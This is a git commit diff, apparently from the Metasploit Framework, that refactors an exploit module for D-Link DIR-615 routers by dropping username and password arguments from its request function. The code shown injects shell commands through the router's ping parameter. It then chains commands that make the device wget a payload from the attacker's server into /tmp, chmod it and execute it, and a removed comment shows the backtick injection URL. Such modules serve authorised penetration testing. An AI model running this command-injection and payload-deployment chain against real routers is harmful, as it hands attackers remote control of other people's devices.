removed user,pass in request

m-1-k-3 · m-1-k-3 · commit f3a2859bed1b · 2013-05-19T18:50:12.000+02:00
diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb
@@ -76,9 +76,7 @@ def initialize(info = {})
 	end
 
 
-	def request(cmd,user,pass)
-		#http://IP/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
-
+	def request(cmd)
 		begin
 			res = send_request_cgi({
 				'uri'    => @uri,
@@ -139,7 +137,7 @@ def exploit
 				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
 			end
 			cmd = payload.encoded
-			res = request(cmd,user,pass)
+			res = request(cmd)
 			if (!res)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			else
@@ -193,7 +191,7 @@ def exploit
 
 		#not working if we send all command together -> lets take three requests
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
-		res = request(cmd,user,pass)
+		res = request(cmd)
 		if (!res)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
@@ -215,7 +213,7 @@ def exploit
 		#
 		cmd = "chmod 777 /tmp/#{filename}"
 		print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
-		res = request(cmd,user,pass)
+		res = request(cmd)
 		if (!res)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
@@ -227,7 +225,7 @@ def exploit
 		#
 		cmd = "/tmp/#{filename}"
 		print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
-		res = request(cmd,user,pass)
+		res = request(cmd)
 		if (!res)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
